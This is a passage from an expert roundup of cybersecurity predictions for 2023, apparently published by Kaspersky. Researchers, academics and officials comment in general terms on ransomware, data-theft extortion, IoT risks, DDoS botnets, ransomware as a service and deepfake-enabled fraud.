    I expect that the theft of medical data (e.g. Finland’s Vastaamo in 2020 and Australia’s Medibank in 2022), as well as highly private personal data (e.g. Ashley Madison in 2015), will become the major focus of ransomware groups and other cybercriminal actors alike. Underpinning this trend, the lesson learned is that imposing massive psychological pressure directly on thousands of separate victims increases the likelihood of individual extortion payouts being made.

    What cyberthreats will pose the most danger to end-users?

    Yury Slobodyanuk, head of content filtering research, Kaspersky

    As the geopolitical situation is quite tense, different types of fraud will take advantage of new events that will take place. Also, various techniques of generating fake news using AI may be used.

    Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

    I believe cybercrime is the biggest threat to end-users, but mainly in an indirect fashion. Cybercrime is looming over providers of essential services and goods such as municipalities, hospitals and even producers of baby food offline, rendering them less or non-operational for several days or weeks. This has a direct impact on citizens’ lives in the real world and is therefore something that I would see as one of the most prevailing threats to individuals.

    Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

    Remote workers in home offices continue to play a major role in everyday working life, along with the increased use of BYOD, which takes control of devices away from administrators. Since 2020, therefore, forms of spear phishing, social engineering and CEO fraud, as well as ransomware, have become increasingly prevalent and will continue to be of considerable importance in 2023. The professionalization of cybercrime, now an independent “industry”, is contributing to a further tightening of the security situation for end users, as low-cost mass attacks are made possible in this way.

    H.E. Dr. Mohamed Al Kuwaiti, UAE Cyber Security Council

    IoT Vulnerabilities. Security issues keep plaguing IoT devices dominating the market today. As IoT combines the physical world and virtual space, home intrusions are being added to the list of the scariest possible threats that IoT brings.

    Vulnerabilities in Autonomous Vehicles. Due to the inherent risks of Autonomous Vehicles, they are increasingly vulnerable to attacks resulting in data breaches, supply chain disruptions, property damage, financial loss, and injury or loss of life.

    What are the main challenges cybersecurity will face in 2023?

    Ivan Kwiatkowski, senior security researcher, GReAT Kaspersky

    The security industry will face direct pressure resulting from the political situation. Things were complex before and they will only get worse. The biggest challenge that vendors will have to face in 2023 will be to remain neutral, if they haven’t decided to align with one block or the other already. (My opinion on this bigger matter is explained in this talk.) Generally speaking, politics and threat intelligence will become more and more entwined, and we’re very unprepared for this as a community.

    Yury Slobodyanuk, head of content filtering research, Kaspersky

    I think attacks will evolve a lot quicker next year, and a main challenge will be to still be a couple of steps ahead.

    Sven Herpig, Director Cybersecurity at think tank Stiftung Neue Verantwortung

    I don’t think that there will be anything substantially new in 2023 – one of the key challenges will still be the lack of adoption of basic security and resilience measures which cybercriminals will successfully exploit.

    Prof. Dr. Dennis-Kenji Kipker, Professor for IT Security Law at the University of Bremen; Visiting Professor at Riga Graduate School of Law; Member of the Board of the European Academy for Freedom of Information and Data Protection (EAID)

    Cybersecurity requires not only secure software, but also sufficiently trustworthy hardware. For too long, we have relied on globalization in IT security and placed too little emphasis on protecting the digital supply chain. In Germany, this was made clear by the debate about protecting sensitive 5G networks; in the geostrategic conflict between the People’s Republic of China and Taiwan, we are now seeing that we are already in the midst of a semiconductor crisis that threatens the security of supply with trustworthy IT. Here, it can be assumed that significant cybersecurity challenges will continue to rise in 2023 as political tensions grow.

    Serge Droz, Technical Advisor, Member of the Board, FIRST

    Cybercrime will continue to focus on optimizing gains per investment, meaning that smaller and/or less mature organizations will be targeted even more. These may be SMEs or businesses in sectors that don’t include IT in their core business, in particular health services. The problem with this target group is that they either have very different priorities (a ransomed hospital simply cannot afford to delay recovery, and thus pays) and don’t have the resources to defend themselves, or they just don’t have the expertise. This is what Wendy Nather calls “living below the security poverty line”. And this will be the challenge to our industry: how can we provide effective protection that works and is affordable to these types of organizations? Or in other words, can we provide security services to people other than security specialists? My guess would be that reaching this goal requires different industries working together; in particular, I feel the role of insurance needs to be clarified and aligned.

    James Range, President of White Rock Security Group

    Cyber teams are going to be in the spotlight now more than ever. Understanding your security posture is crucial; knowing what current tools are available and the gaps that currently exist in your infrastructure will help you to protect your enterprise. The need for bigger cyber budgets and having the right people in place is critical. With ongoing talent shortages, consider partnering with a third-party firm to ensure you have fail-proof processes, documentation, and regular third-party assessments.

    H.E. Dr. Mohamed Al Kuwaiti, UAE Cyber Security Council

    DDoS Botnets. One of the most recent severe attacks, around the end of June 2021, was made using malware called the Mēris botnet, which set a new record. Given the new nature of the malware, which has been described as a “new assaulting force on the Internet – a botnet of a new kind”, and its impact, it is likely that similar real-time emerging malware-related DDoS attacks will be used in 2023.

    Ransomware as a service (RaaS). Unlike other forms of malware, this new service provides “a sort of criminal Content Distribution Network (CDN) similar, in principle, to those used by major internet portals but used exclusively for malware”. Nearly half of breaches during the first six months of 2022 involved stolen credentials, Switzerland-based cybersecurity company Acronis reported in its Mid-Year Cyberthreat Report, published on August 24, 2022. This has probably been the most discussed attack in 2022, as it’s the first time a country declared a national emergency in response to a cyber-attack. Ransomware-based malware has been quite active in 2022.

    Deepfake-enabled business compromise. Deepfake-enabled compromise is a type of attack where threat actors leverage synthetic content. This includes video or audio altered or created using artificial intelligence and machine learning to impersonate C-suite executives and trick employees into transferring large sums of cash.
